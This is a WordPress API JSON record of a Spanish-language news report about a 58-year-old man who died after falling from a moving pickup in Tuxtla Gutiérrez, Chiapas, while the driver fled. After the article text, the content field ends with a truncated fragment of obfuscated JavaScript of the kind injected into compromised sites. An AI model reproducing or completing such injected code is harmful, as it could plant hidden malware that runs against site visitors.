{"id":19975,"date":"2025-01-22T04:14:44","date_gmt":"2025-01-22T04:14:44","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=19975"},"modified":"2025-01-22T04:14:44","modified_gmt":"2025-01-22T04:14:44","slug":"hombre-pierde-la-vida-al-caer-de-una-camioneta","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=19975","title":{"rendered":"Hombre pierde la vida al caer de una camioneta"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250121-WA0014-1024x768.jpg\" alt=\"\" class=\"wp-image-19976\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250121-WA0014-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250121-WA0014-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250121-WA0014-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250121-WA0014-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250121-WA0014.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>21 de enero del 2025. Tuxtla Guti\u00e9rrez. &#8211; Este martes por la tarde un sujeto perdi\u00f3 la vida cay\u00f3 de una camioneta en movimiento cuando circulaba sobre la 9a Sur caso casi esquina del Bulevar Andr\u00e9s Serra Rojas.<\/p>\n\n\n\n<p>De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando el sujeto identificado como Rub\u00e9n de 58 a\u00f1os de edad iba en una camioneta Pick up en el sentido de Poniente a Oriente cuando perdi\u00f3 el equilibrio y se cay\u00f3.<\/p>\n\n\n\n<p>El conductor de la unidad detuvo su marcha pero despu\u00e9s se escap\u00f3.<\/p>\n\n\n\n<p>En el lugar arribaron param\u00e9dicos y determinaron que el hombre se golpe\u00f3 la cabeza lo que ocasion\u00f3 traumatismo craneoencef\u00e1lico.<\/p>\n\n\n\n<p>Elementos de tr\u00e1nsito arribaron al lugar para acordonaron el \u00e1rea.<\/p>\n\n\n\n<p>Peritos de la Fiscal\u00eda General del Estado realizaron las diligencias correspondientes, levantaron el cuerpo y lo trasladaron al Semefo donde se practicar\u00eda la necropsia de ley.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. 21 de enero del 2025. Tuxtla Guti\u00e9rrez. &#8211; Este martes por la tarde un sujeto perdi\u00f3 la vida cay\u00f3 de una camioneta en movimiento cuando circulaba sobre la 9a Sur caso casi esquina del Bulevar Andr\u00e9s Serra Rojas. De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando el sujeto identificado como Rub\u00e9n &hellip;<\/p>\n","protected":false},"author":2,"featured_media":19976,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-19975","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19975","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=19975"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19975\/revisions"}],"predecessor-version":[{"id":19977,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19975\/revisions\/19977"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/19976"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=19975"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=19975"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=19975"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}